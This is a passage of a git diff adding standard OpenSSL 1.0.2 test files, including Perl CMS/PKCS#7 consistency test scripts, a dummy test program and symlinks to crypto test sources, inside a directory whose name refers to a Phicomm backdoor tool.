+      . " -in $cmsdir/$tfile -out tmp.txt";
+
+    $cmd .= " -content $cmsdir/ExContent.bin" if $tlist =~ /cont_extern/;
+
+    system("$cmd 2>cms.err 1>cms.out");
+
+    if ($?) {
+        print "\tVerify command FAILED!!\n";
+        $badtest++;
+    }
+    elsif ( $tlist =~ /cont/
+        && !cmp_files( "$cmsdir/ExContent.bin", "tmp.txt" ) )
+    {
+        print "\tVerify content compare FAILED!!\n";
+        $badtest++;
+    }
+    else {
+        print "\tVerify passed\n" if $verbose;
+    }
+}
+
+sub run_envelope_test {
+    my ( $cmsdir, $tlist, $tfile ) = @_;
+    unlink "tmp.txt";
+
+    $form = "DER"   if $tlist =~ /envelopeder/;
+    $form = "SMIME" if $tlist =~ /envelopemime/;
+
+    $cmd =
+        "$cmscmd -decrypt -inform $form"
+      . " -recip $cmsdir/BobRSASignByCarl.pem"
+      . " -inkey $cmsdir/BobPrivRSAEncrypt.pem"
+      . " -in $cmsdir/$tfile -out tmp.txt";
+
+    system("$cmd 2>cms.err 1>cms.out");
+
+    if ($?) {
+        print "\tDecrypt command FAILED!!\n";
+        $badtest++;
+    }
+    elsif ( $tlist =~ /cont/
+        && !cmp_files( "$cmsdir/ExContent.bin", "tmp.txt" ) )
+    {
+        print "\tDecrypt content compare FAILED!!\n";
+        $badtest++;
+    }
+    else {
+        print "\tDecrypt passed\n" if $verbose;
+    }
+}
+
+sub run_digest_test {
+    my ( $cmsdir, $tlist, $tfile ) = @_;
+    unlink "tmp.txt";
+
+    my $cmd =
+      "$cmscmd -digest_verify -inform DER" . " -in $cmsdir/$tfile -out tmp.txt";
+
+    system("$cmd 2>cms.err 1>cms.out");
+
+    if ($?) {
+        print "\tDigest verify command FAILED!!\n";
+        $badtest++;
+    }
+    elsif ( $tlist =~ /cont/
+        && !cmp_files( "$cmsdir/ExContent.bin", "tmp.txt" ) )
+    {
+        print "\tDigest verify content compare FAILED!!\n";
+        $badtest++;
+    }
+    else {
+        print "\tDigest verify passed\n" if $verbose;
+    }
+}
+
+sub run_encrypted_test {
+    my ( $cmsdir, $tlist, $tfile, $key ) = @_;
+    unlink "tmp.txt";
+
+    system( "$cmscmd -EncryptedData_decrypt -inform DER"
+          . " -secretkey $key"
+          . " -in $cmsdir/$tfile -out tmp.txt" );
+
+    if ($?) {
+        print "\tEncrypted Data command FAILED!!\n";
+        $badtest++;
+    }
+    elsif ( $tlist =~ /cont/
+        && !cmp_files( "$cmsdir/ExContent.bin", "tmp.txt" ) )
+    {
+        print "\tEncrypted Data content compare FAILED!!\n";
+        $badtest++;
+    }
+    else {
+        print "\tEncryptedData verify passed\n" if $verbose;
+    }
+}
+
+sub cmp_files {
+    my ( $f1, $f2 ) = @_;
+    my ( $fp1, $fp2 );
+
+    my ( $rd1, $rd2 );
+
+    if ( !open( $fp1, "<$f1" ) ) {
+        print STDERR "Can't Open file $f1\n";
+        return 0;
+    }
+
+    if ( !open( $fp2, "<$f2" ) ) {
+        print STDERR "Can't Open file $f2\n";
+        return 0;
+    }
+
+    binmode $fp1;
+    binmode $fp2;
+
+    my $ret = 0;
+
+    for ( ; ; ) {
+        $n1 = sysread $fp1, $rd1, 4096;
+        $n2 = sysread $fp2, $rd2, 4096;
+        last if ( $n1 != $n2 );
+        last if ( $rd1 ne $rd2 );
+
+        if ( $n1 == 0 ) {
+            $ret = 1;
+            last;
+        }
+
+    }
+
+    close $fp1;
+    close $fp2;
+
+    return $ret;
+
+}
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/cms-test.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/cms-test.pl
new file mode 100644
index 0000000..f55fd69
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/cms-test.pl
@@ -0,0 +1,606 @@
+# test/cms-test.pl
+# Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL
+# project.
+#
+# ====================================================================
+# Copyright (c) 2008 The OpenSSL Project.  All rights reserved.
+#
+# Redistribution and use in source and binary forms, with or without
+# modification, are permitted provided that the following conditions
+# are met:
+#
+# 1. Redistributions of source code must retain the above copyright
+#    notice, this list of conditions and the following disclaimer.
+#
+# 2. Redistributions in binary form must reproduce the above copyright
+#    notice, this list of conditions and the following disclaimer in
+#    the documentation and/or other materials provided with the
+#    distribution.
+#
+# 3. All advertising materials mentioning features or use of this
+#    software must display the following acknowledgment:
+#    "This product includes software developed by the OpenSSL Project
+#    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+#
+# 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+#    endorse or promote products derived from this software without
+#    prior written permission. For written permission, please contact
+#    licensing@OpenSSL.org.
+#
+# 5. Products derived from this software may not be called "OpenSSL"
+#    nor may "OpenSSL" appear in their names without prior written
+#    permission of the OpenSSL Project.
+#
+# 6. Redistributions of any form whatsoever must retain the following
+#    acknowledgment:
+#    "This product includes software developed by the OpenSSL Project
+#    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+#
+# THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+# EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+# PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+# ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+# NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+# STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+# OF THE POSSIBILITY OF SUCH DAMAGE.
+# ====================================================================
+
+# CMS, PKCS7 consistency test script. Run extensive tests on
+# OpenSSL PKCS#7 and CMS implementations.
+
+my $ossl_path;
+my $redir = " 2> cms.err > cms.out";
+# Make VMS work
+if ( $^O eq "VMS" && -f "OSSLX:openssl.exe" ) {
+    $ossl_path = "pipe mcr OSSLX:openssl";
+    $null_path = "NL:";
+}
+# Make MSYS work
+elsif ( $^O eq "MSWin32" && -f "../apps/openssl.exe" ) {
+    $ossl_path = "cmd /c ..\\apps\\openssl";
+    $null_path = "/dev/null";
+}
+elsif ( -f "../apps/openssl$ENV{EXE_EXT}" ) {
+    $ossl_path = "../util/shlib_wrap.sh ../apps/openssl";
+    $null_path = "/dev/null";
+}
+elsif ( -f "..\\out32dll\\openssl.exe" ) {
+    $ossl_path = "..\\out32dll\\openssl.exe";
+    $null_path = "/dev/null";
+}
+elsif ( -f "..\\out32\\openssl.exe" ) {
+    $ossl_path = "..\\out32\\openssl.exe";
+    $null_path = "/dev/null";
+}
+else {
+    die "Can't find OpenSSL executable";
+}
+
+my $pk7cmd   = "$ossl_path smime ";
+my $cmscmd   = "$ossl_path cms ";
+my $smdir    = "smime-certs";
+my $halt_err = 1;
+
+my $badcmd = 0;
+my $no_ec;
+my $no_ec2m;
+my $no_ecdh;
+my $ossl8 = `$ossl_path version -v` =~ /0\.9\.8/;
+
+system ("$ossl_path no-ec > $null_path");
+if ($? == 0)
+	{
+	$no_ec = 1;
+	}
+elsif ($^O eq "VMS" ? $? == 512 : $? == 256)
+	{
+	$no_ec = 0;
+	}
+else
+	{
+	die "Error checking for EC support\n";
+	}
+    
+system ("$ossl_path no-ec2m > $null_path");
+if ($? == 0)
+	{
+	$no_ec2m = 1;
+	}
+elsif ($? == 256)
+	{
+	$no_ec2m = 0;
+	}
+else
+	{
+	die "Error checking for EC2M support\n";
+	}
+
+system ("$ossl_path no-ecdh > $null_path");
+if ($? == 0)
+	{
+	$no_ecdh = 1;
+	}
+elsif ($? == 256)
+	{
+	$no_ecdh = 0;
+	}
+else
+	{
+	die "Error checking for ECDH support\n";
+	}
+    
+my @smime_pkcs7_tests = (
+
+    [
+        "signed content DER format, RSA key",
+        "-sign -in smcont.txt -outform \"DER\" -nodetach"
+          . " -certfile $smdir/smroot.pem"
+          . " -signer $smdir/smrsa1.pem -out test.cms",
+        "-verify -in test.cms -inform \"DER\" "
+          . " \"-CAfile\" $smdir/smroot.pem -out smtst.txt"
+    ],
+
+    [
+        "signed detached content DER format, RSA key",
+        "-sign -in smcont.txt -outform \"DER\""
+          . " -signer $smdir/smrsa1.pem -out test.cms",
+        "-verify -in test.cms -inform \"DER\" "
+          . " \"-CAfile\" $smdir/smroot.pem -out smtst.txt -content smcont.txt"
+    ],
+
+    [
+        "signed content test streaming BER format, RSA",
+        "-sign -in smcont.txt -outform \"DER\" -nodetach"
+          . " -stream -signer $smdir/smrsa1.pem -out test.cms",
+        "-verify -in test.cms -inform \"DER\" "
+          . " \"-CAfile\" $smdir/smroot.pem -out smtst.txt"
+    ],
+
+    [
+        "signed content DER format, DSA key",
+        "-sign -in smcont.txt -outform \"DER\" -nodetach"
+          . " -signer $smdir/smdsa1.pem -out test.cms",
+        "-verify -in test.cms -inform \"DER\" "
+          . " \"-CAfile\" $smdir/smroot.pem -out smtst.txt"
+    ],
+
+    [
+        "signed detached content DER format, DSA key",
+        "-sign -in smcont.txt -outform \"DER\""
+          . " -signer $smdir/smdsa1.pem -out test.cms",
+        "-verify -in test.cms -inform \"DER\" "
+          . " \"-CAfile\" $smdir/smroot.pem -out smtst.txt -content smcont.txt"
+    ],
+
+    [
+        "signed detached content DER format, add RSA signer",
+        "-resign -inform \"DER\" -in test.cms -outform \"DER\""
+          . " -signer $smdir/smrsa1.pem -out test2.cms",
+        "-verify -in test2.cms -inform \"DER\" "
+          . " \"-CAfile\" $smdir/smroot.pem -out smtst.txt -content smcont.txt"
+    ],
+
+    [
+        "signed content test streaming BER format, DSA key",
+        "-sign -in smcont.txt -outform \"DER\" -nodetach"
+          . " -stream -signer $smdir/smdsa1.pem -out test.cms",
+        "-verify -in test.cms -inform \"DER\" "
+          . " \"-CAfile\" $smdir/smroot.pem -out smtst.txt"
+    ],
+
+    [
+        "signed content test streaming BER format, 2 DSA and 2 RSA keys",
+        "-sign -in smcont.txt -outform \"DER\" -nodetach"
+          . " -signer $smdir/smrsa1.pem -signer $smdir/smrsa2.pem"
+          . " -signer $smdir/smdsa1.pem -signer $smdir/smdsa2.pem"
+          . " -stream -out test.cms",
+        "-verify -in test.cms -inform \"DER\" "
+          . " \"-CAfile\" $smdir/smroot.pem -out smtst.txt"
+    ],
+
+    [
+"signed content test streaming BER format, 2 DSA and 2 RSA keys, no attributes",
+        "-sign -in smcont.txt -outform \"DER\" -noattr -nodetach"
+          . " -signer $smdir/smrsa1.pem -signer $smdir/smrsa2.pem"
+          . " -signer $smdir/smdsa1.pem -signer $smdir/smdsa2.pem"
+          . " -stream -out test.cms",
+        "-verify -in test.cms -inform \"DER\" "
+          . " \"-CAfile\" $smdir/smroot.pem -out smtst.txt"
+    ],
+
+    [
+        "signed content test streaming S/MIME format, 2 DSA and 2 RSA keys",
+        "-sign -in smcont.txt -nodetach"
+          . " -signer $smdir/smrsa1.pem -signer $smdir/smrsa2.pem"
+          . " -signer $smdir/smdsa1.pem -signer $smdir/smdsa2.pem"
+          . " -stream -out test.cms",
+        "-verify -in test.cms " . " \"-CAfile\" $smdir/smroot.pem -out smtst.txt"
+    ],
+
+    [
+"signed content test streaming multipart S/MIME format, 2 DSA and 2 RSA keys",
+        "-sign -in smcont.txt"
+          . " -signer $smdir/smrsa1.pem -signer $smdir/smrsa2.pem"
+          . " -signer $smdir/smdsa1.pem -signer $smdir/smdsa2.pem"
+          . " -stream -out test.cms",
+        "-verify -in test.cms " . " \"-CAfile\" $smdir/smroot.pem -out smtst.txt"
+    ],
+
+    [
+        "enveloped content test streaming S/MIME format, 3 recipients",
+        "-encrypt -in smcont.txt"
+          . " -stream -out test.cms"
+          . " $smdir/smrsa1.pem $smdir/smrsa2.pem $smdir/smrsa3.pem ",
+        "-decrypt -recip $smdir/smrsa1.pem -in test.cms -out smtst.txt"
+    ],
+
+    [
+"enveloped content test streaming S/MIME format, 3 recipients, 3rd used",
+        "-encrypt -in smcont.txt"
+          . " -stream -out test.cms"
+          . " $smdir/smrsa1.pem $smdir/smrsa2.pem $smdir/smrsa3.pem ",
+        "-decrypt -recip $smdir/smrsa3.pem -in test.cms -out smtst.txt"
+    ],
+
+    [
+"enveloped content test streaming S/MIME format, 3 recipients, key only used",
+        "-encrypt -in smcont.txt"
+          . " -stream -out test.cms"
+          . " $smdir/smrsa1.pem $smdir/smrsa2.pem $smdir/smrsa3.pem ",
+        "-decrypt -inkey $smdir/smrsa3.pem -in test.cms -out smtst.txt"
+    ],
+
+    [
+"enveloped content test streaming S/MIME format, AES-256 cipher, 3 recipients",
+        "-encrypt -in smcont.txt"
+          . " -aes256 -stream -out test.cms"
+          . " $smdir/smrsa1.pem $smdir/smrsa2.pem $smdir/smrsa3.pem ",
+        "-decrypt -recip $smdir/smrsa1.pem -in test.cms -out smtst.txt"
+    ],
+
+);
+
+my @smime_cms_tests = (
+
+    [
+        "signed content test streaming BER format, 2 DSA and 2 RSA keys, keyid",
+        "-sign -in smcont.txt -outform \"DER\" -nodetach -keyid"
+          . " -signer $smdir/smrsa1.pem -signer $smdir/smrsa2.pem"
+          . " -signer $smdir/smdsa1.pem -signer $smdir/smdsa2.pem"
+          . " -stream -out test.cms",
+        "-verify -in test.cms -inform \"DER\" "
+          . " \"-CAfile\" $smdir/smroot.pem -out smtst.txt"
+    ],
+
+    [
+        "signed content test streaming PEM format, 2 DSA and 2 RSA keys",
+        "-sign -in smcont.txt -outform PEM -nodetach"
+          . " -signer $smdir/smrsa1.pem -signer $smdir/smrsa2.pem"
+          . " -signer $smdir/smdsa1.pem -signer $smdir/smdsa2.pem"
+          . " -stream -out test.cms",
+        "-verify -in test.cms -inform PEM "
+          . " \"-CAfile\" $smdir/smroot.pem -out smtst.txt"
+    ],
+
+    [
+        "signed content MIME format, RSA key, signed receipt request",
+        "-sign -in smcont.txt -signer $smdir/smrsa1.pem -nodetach"
+          . " -receipt_request_to test\@openssl.org -receipt_request_all"
+          . " -out test.cms",
+        "-verify -in test.cms "
+          . " \"-CAfile\" $smdir/smroot.pem -out smtst.txt"
+    ],
+
+    [
+        "signed receipt MIME format, RSA key",
+        "-sign_receipt -in test.cms"
+          . " -signer $smdir/smrsa2.pem"
+          . " -out test2.cms",
+        "-verify_receipt test2.cms -in test.cms"
+          . " \"-CAfile\" $smdir/smroot.pem"
+    ],
+
+    [
+        "enveloped content test streaming S/MIME format, 3 recipients, keyid",
+        "-encrypt -in smcont.txt"
+          . " -stream -out test.cms -keyid"
+          . " $smdir/smrsa1.pem $smdir/smrsa2.pem $smdir/smrsa3.pem ",
+        "-decrypt -recip $smdir/smrsa1.pem -in test.cms -out smtst.txt"
+    ],
+
+    [
+        "enveloped content test streaming PEM format, KEK",
+        "-encrypt -in smcont.txt -outform PEM -aes128"
+          . " -stream -out test.cms "
+          . " -secretkey 000102030405060708090A0B0C0D0E0F "
+          . " -secretkeyid C0FEE0",
+        "-decrypt -in test.cms -out smtst.txt -inform PEM"
+          . " -secretkey 000102030405060708090A0B0C0D0E0F "
+          . " -secretkeyid C0FEE0"
+    ],
+
+    [
+        "enveloped content test streaming PEM format, KEK, key only",
+        "-encrypt -in smcont.txt -outform PEM -aes128"
+          . " -stream -out test.cms "
+          . " -secretkey 000102030405060708090A0B0C0D0E0F "
+          . " -secretkeyid C0FEE0",
+        "-decrypt -in test.cms -out smtst.txt -inform PEM"
+          . " -secretkey 000102030405060708090A0B0C0D0E0F "
+    ],
+
+    [
+        "data content test streaming PEM format",
+        "-data_create -in smcont.txt -outform PEM -nodetach"
+          . " -stream -out test.cms",
+        "-data_out -in test.cms -inform PEM -out smtst.txt"
+    ],
+
+    [
+        "encrypted content test streaming PEM format, 128 bit RC2 key",
+        "\"-EncryptedData_encrypt\" -in smcont.txt -outform PEM"
+          . " -rc2 -secretkey 000102030405060708090A0B0C0D0E0F"
+          . " -stream -out test.cms",
+        "\"-EncryptedData_decrypt\" -in test.cms -inform PEM "
+          . " -secretkey 000102030405060708090A0B0C0D0E0F -out smtst.txt"
+    ],
+
+    [
+        "encrypted content test streaming PEM format, 40 bit RC2 key",
+        "\"-EncryptedData_encrypt\" -in smcont.txt -outform PEM"
+          . " -rc2 -secretkey 0001020304"
+          . " -stream -out test.cms",
+        "\"-EncryptedData_decrypt\" -in test.cms -inform PEM "
+          . " -secretkey 0001020304 -out smtst.txt"
+    ],
+
+    [
+        "encrypted content test streaming PEM format, triple DES key",
+        "\"-EncryptedData_encrypt\" -in smcont.txt -outform PEM"
+          . " -des3 -secretkey 000102030405060708090A0B0C0D0E0F1011121314151617"
+          . " -stream -out test.cms",
+        "\"-EncryptedData_decrypt\" -in test.cms -inform PEM "
+          . " -secretkey 000102030405060708090A0B0C0D0E0F1011121314151617"
+          . " -out smtst.txt"
+    ],
+
+    [
+        "encrypted content test streaming PEM format, 128 bit AES key",
+        "\"-EncryptedData_encrypt\" -in smcont.txt -outform PEM"
+          . " -aes128 -secretkey 000102030405060708090A0B0C0D0E0F"
+          . " -stream -out test.cms",
+        "\"-EncryptedData_decrypt\" -in test.cms -inform PEM "
+          . " -secretkey 000102030405060708090A0B0C0D0E0F -out smtst.txt"
+    ],
+
+);
+
+my @smime_cms_comp_tests = (
+
+    [
+        "compressed content test streaming PEM format",
+        "-compress -in smcont.txt -outform PEM -nodetach"
+          . " -stream -out test.cms",
+        "-uncompress -in test.cms -inform PEM -out smtst.txt"
+    ]
+
+);
+
+my @smime_cms_param_tests = (
+    [
+        "signed content test streaming PEM format, RSA keys, PSS signature",
+        "-sign -in smcont.txt -outform PEM -nodetach"
+          . " -signer $smdir/smrsa1.pem -keyopt rsa_padding_mode:pss"
+	  . " -out test.cms",
+        "-verify -in test.cms -inform PEM "
+          . " \"-CAfile\" $smdir/smroot.pem -out smtst.txt"
+    ],
+
+    [
+        "signed content test streaming PEM format, RSA keys, PSS signature, no attributes",
+        "-sign -in smcont.txt -outform PEM -nodetach -noattr"
+          . " -signer $smdir/smrsa1.pem -keyopt rsa_padding_mode:pss"
+	  . " -out test.cms",
+        "-verify -in test.cms -inform PEM "
+          . " \"-CAfile\" $smdir/smroot.pem -out smtst.txt"
+    ],
+
+    [
+        "signed content test streaming PEM format, RSA keys, PSS signature, SHA384 MGF1",
+        "-sign -in smcont.txt -outform PEM -nodetach"
+          . " -signer $smdir/smrsa1.pem -keyopt rsa_padding_mode:pss"
+	  . " -keyopt rsa_mgf1_md:sha384 -out test.cms",
+        "-verify -in test.cms -inform PEM "
+          . " \"-CAfile\" $smdir/smroot.pem -out smtst.txt"
+    ],
+
+    [
+"enveloped content test streaming S/MIME format, OAEP default parameters",
+        "-encrypt -in smcont.txt"
+          . " -stream -out test.cms"
+          . " -recip $smdir/smrsa1.pem -keyopt rsa_padding_mode:oaep",
+        "-decrypt -recip $smdir/smrsa1.pem -in test.cms -out smtst.txt"
+    ],
+
+    [
+"enveloped content test streaming S/MIME format, OAEP SHA256",
+        "-encrypt -in smcont.txt"
+          . " -stream -out test.cms"
+          . " -recip $smdir/smrsa1.pem -keyopt rsa_padding_mode:oaep"
+	  . " -keyopt rsa_oaep_md:sha256",
+        "-decrypt -recip $smdir/smrsa1.pem -in test.cms -out smtst.txt"
+    ],
+
+    [
+"enveloped content test streaming S/MIME format, ECDH",
+        "-encrypt -in smcont.txt"
+          . " -stream -out test.cms"
+          . " -recip $smdir/smec1.pem",
+        "-decrypt -recip $smdir/smec1.pem -in test.cms -out smtst.txt"
+    ],
+
+    [
+"enveloped content test streaming S/MIME format, ECDH, AES128, SHA256 KDF",
+        "-encrypt -in smcont.txt"
+          . " -stream -out test.cms"
+          . " -recip $smdir/smec1.pem -aes128 -keyopt ecdh_kdf_md:sha256",
+        "-decrypt -recip $smdir/smec1.pem -in test.cms -out smtst.txt"
+    ],
+
+    [
+"enveloped content test streaming S/MIME format, ECDH, K-283, cofactor DH",
+        "-encrypt -in smcont.txt"
+          . " -stream -out test.cms"
+          . " -recip $smdir/smec2.pem -aes128"
+	  . " -keyopt ecdh_kdf_md:sha256 -keyopt ecdh_cofactor_mode:1",
+        "-decrypt -recip $smdir/smec2.pem -in test.cms -out smtst.txt"
+    ],
+
+    [
+"enveloped content test streaming S/MIME format, X9.42 DH",
+        "-encrypt -in smcont.txt"
+          . " -stream -out test.cms"
+          . " -recip $smdir/smdh.pem -aes128",
+        "-decrypt -recip $smdir/smdh.pem -in test.cms -out smtst.txt"
+    ]
+);
+
+print "CMS => PKCS#7 compatibility tests\n";
+
+run_smime_tests( \$badcmd, \@smime_pkcs7_tests, $cmscmd, $pk7cmd );
+
+print "CMS <= PKCS#7 compatibility tests\n";
+
+run_smime_tests( \$badcmd, \@smime_pkcs7_tests, $pk7cmd, $cmscmd );
+
+print "CMS <=> CMS consistency tests\n";
+
+run_smime_tests( \$badcmd, \@smime_pkcs7_tests, $cmscmd, $cmscmd );
+run_smime_tests( \$badcmd, \@smime_cms_tests,   $cmscmd, $cmscmd );
+
+print "CMS <=> CMS consistency tests, modified key parameters\n";
+run_smime_tests( \$badcmd, \@smime_cms_param_tests,   $cmscmd, $cmscmd );
+
+if ( `$ossl_path version -f` =~ /ZLIB/ ) {
+    run_smime_tests( \$badcmd, \@smime_cms_comp_tests, $cmscmd, $cmscmd );
+}
+else {
+    print "Zlib not supported: compression tests skipped\n";
+}
+
+print "Running modified tests for OpenSSL 0.9.8 cms backport\n" if($ossl8);
+
+if ($badcmd) {
+    print "$badcmd TESTS FAILED!!\n";
+}
+else {
+    print "ALL TESTS SUCCESSFUL.\n";
+}
+
+unlink "test.cms";
+unlink "test2.cms";
+unlink "smtst.txt";
+unlink "cms.out";
+unlink "cms.err";
+
+sub run_smime_tests {
+    my ( $rv, $aref, $scmd, $vcmd ) = @_;
+
+    foreach $smtst (@$aref) {
+        my ( $tnam, $rscmd, $rvcmd ) = @$smtst;
+	if ($ossl8)
+		{
+		# Skip smime resign: 0.9.8 smime doesn't support -resign	
+		next if ($scmd =~ /smime/ && $rscmd =~ /-resign/);
+		# Disable streaming: option not supported in 0.9.8
+		$tnam =~ s/streaming//;	
+		$rscmd =~ s/-stream//;	
+		$rvcmd =~ s/-stream//;
+		}
+	if ($no_ec && $tnam =~ /ECDH/)
+		{
+		print "$tnam: skipped, EC disabled\n";
+		next;
+		}
+	if ($no_ecdh && $tnam =~ /ECDH/)
+		{
+		print "$tnam: skipped, ECDH disabled\n";
+		next;
+		}
+	if ($no_ec2m && $tnam =~ /K-283/)
+		{
+		print "$tnam: skipped, EC2M disabled\n";
+		next;
+		}
+        system("$scmd$rscmd$redir");
+        if ($?) {
+            print "$tnam: generation error\n";
+            $$rv++;
+            exit 1 if $halt_err;
+            next;
+        }
+        system("$vcmd$rvcmd$redir");
+        if ($?) {
+            print "$tnam: verify error\n";
+            $$rv++;
+            exit 1 if $halt_err;
+            next;
+        }
+	if (!cmp_files("smtst.txt", "smcont.txt")) {
+            print "$tnam: content verify error\n";
+            $$rv++;
+            exit 1 if $halt_err;
+            next;
+	}
+        print "$tnam: OK\n";
+    }
+}
+
+sub cmp_files {
+    use FileHandle;
+    my ( $f1, $f2 ) = @_;
+    my $fp1 = FileHandle->new();
+    my $fp2 = FileHandle->new();
+
+    my ( $rd1, $rd2 );
+
+    if ( !open( $fp1, "<$f1" ) ) {
+        print STDERR "Can't Open file $f1\n";
+        return 0;
+    }
+
+    if ( !open( $fp2, "<$f2" ) ) {
+        print STDERR "Can't Open file $f2\n";
+        return 0;
+    }
+
+    binmode $fp1;
+    binmode $fp2;
+
+    my $ret = 0;
+
+    for ( ; ; ) {
+        $n1 = sysread $fp1, $rd1, 4096;
+        $n2 = sysread $fp2, $rd2, 4096;
+        last if ( $n1 != $n2 );
+        last if ( $rd1 ne $rd2 );
+
+        if ( $n1 == 0 ) {
+            $ret = 1;
+            last;
+        }
+
+    }
+
+    close $fp1;
+    close $fp2;
+
+    return $ret;
+
+}
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/constant_time_test.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/constant_time_test.c
new file mode 120000
index 0000000..519f2f3
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/constant_time_test.c
@@ -0,0 +1 @@
+../crypto/constant_time_test.c
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/destest.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/destest.c
new file mode 120000
index 0000000..5988c73
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/destest.c
@@ -0,0 +1 @@
+../crypto/des/destest.c
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/dhtest.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/dhtest.c
new file mode 120000
index 0000000..9a67f91
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/dhtest.c
@@ -0,0 +1 @@
+../crypto/dh/dhtest.c
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/dsatest.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/dsatest.c
new file mode 120000
index 0000000..16a1b5a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/dsatest.c
@@ -0,0 +1 @@
+../crypto/dsa/dsatest.c
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/dummytest.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/dummytest.c
new file mode 100644
index 0000000..554acc2
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/dummytest.c
@@ -0,0 +1,57 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <ctype.h>
+#include <openssl/e_os2.h>
+#include <openssl/buffer.h>
+#include <openssl/crypto.h>
+
+int main(int argc, char *argv[])
+{
+    char *p, *q = 0, *program;
+
+    p = strrchr(argv[0], '/');
+    if (!p)
+        p = strrchr(argv[0], '\\');
+#ifdef OPENSSL_SYS_VMS
+    if (!p)
+        p = strrchr(argv[0], ']');
+    if (p)
+        q = strrchr(p, '>');
+    if (q)
+        p = q;
+    if (!p)
+        p = strrchr(argv[0], ':');
+    q = 0;
+#endif
+    if (p)
+        p++;
+    if (!p)
+        p = argv[0];
+    if (p)
+        q = strchr(p, '.');
+    if (p && !q)
+        q = p + strlen(p);
+
+    if (!p)
+        program = BUF_strdup("(unknown)");
+    else {
+        program = OPENSSL_malloc((q - p) + 1);
+        strncpy(program, p, q - p);
+        program[q - p] = '\0';
+    }
+
+    for (p = program; *p; p++)
+        if (islower((unsigned char)(*p)))
+            *p = toupper((unsigned char)(*p));
+
+    q = strstr(program, "TEST");
+    if (q > p && q[-1] == '_')
+        q--;
+    *q = '\0';
+
+    printf("No %s support\n", program);
+
+    OPENSSL_free(program);
+    return (0);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ecdhtest.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ecdhtest.c
new file mode 120000
index 0000000..206d986
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ecdhtest.c
@@ -0,0 +1 @@
+../crypto/ecdh/ecdhtest.c
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ecdsatest.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ecdsatest.c
new file mode 120000
index 0000000..441082b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ecdsatest.c
@@ -0,0 +1 @@
+../crypto/ecdsa/ecdsatest.c
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ectest.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ectest.c
new file mode 120000
index 0000000..df1831f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ectest.c
@@ -0,0 +1 @@
+../crypto/ec/ectest.c
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/enginetest.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/enginetest.c
new file mode 120000
index 0000000..5c74a6f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/enginetest.c
@@ -0,0 +1 @@
+../crypto/engine/enginetest.c
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/evp_test.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/evp_test.c
new file mode 120000
index 0000000..0741628
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/evp_test.c
@@ -0,0 +1 @@
+../crypto/evp/evp_test.c
\ No newline at end of file
